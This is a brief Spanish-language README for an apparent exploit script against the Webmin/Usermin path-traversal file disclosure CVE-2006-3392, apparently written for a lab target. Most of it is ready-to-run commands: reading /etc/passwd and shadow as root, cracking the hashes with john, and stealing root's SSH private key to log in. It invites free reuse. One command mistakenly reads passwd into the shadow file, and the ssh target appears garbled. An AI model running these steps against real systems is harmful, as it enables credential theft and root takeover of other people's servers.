
Webmin < 1.290 / Usermin < 1.220 - Divulgación arbitraria de archivos
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin anterior a 1.290 y Usermin anterior a 1.220 llaman a la función simplify_path antes de decodificar HTML, lo que permite a atacantes remotos leer archivos arbitrarios, como se demuestra usando secuencias "..%01", que omiten la eliminación de secuencias "../" antes de que bytes como "%01" sean eliminados del nombre de archivo. NOTA: Este es un problema diferente a CVE-2006-3274.
Explora cualquier archivo del sistema de archivos con privilegios de root
./exploit.sh <target ip> <target port> <file to disclose>
Explora passwd y shadow en 10.10.11.105, ejecuta unshadow y descifra los hashes
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Explora la clave privada rsa en 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
Siéntete libre de usarlo o modificarlo cuando y donde quieras.